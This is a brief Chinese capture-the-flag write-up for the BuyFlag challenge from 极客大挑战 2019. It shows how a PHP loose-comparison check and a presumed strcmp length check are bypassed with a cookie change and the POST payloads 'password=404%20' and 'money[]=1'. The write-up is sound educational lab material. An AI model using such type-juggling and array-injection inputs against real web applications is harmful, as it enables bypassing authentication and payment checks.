极客大挑战2019 BuyFlag

打开playing

得到提示 Only Cuit’s students can buy the FLAG

先把user改了1
avatar

又根据下面的代码

1
2
3
4
5
6
7
8
9
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}

需要POST请求 更改请求 根据代码得知是弱口令
所以传参:

1
password=404%20

avatar

又得到提示 要买flag
本来想用

1
password=404%20&money=100000000

但是发现超出了长度

所以猜测使用了strcmp

payload:

1
password=404%20&money[]=1

得到flag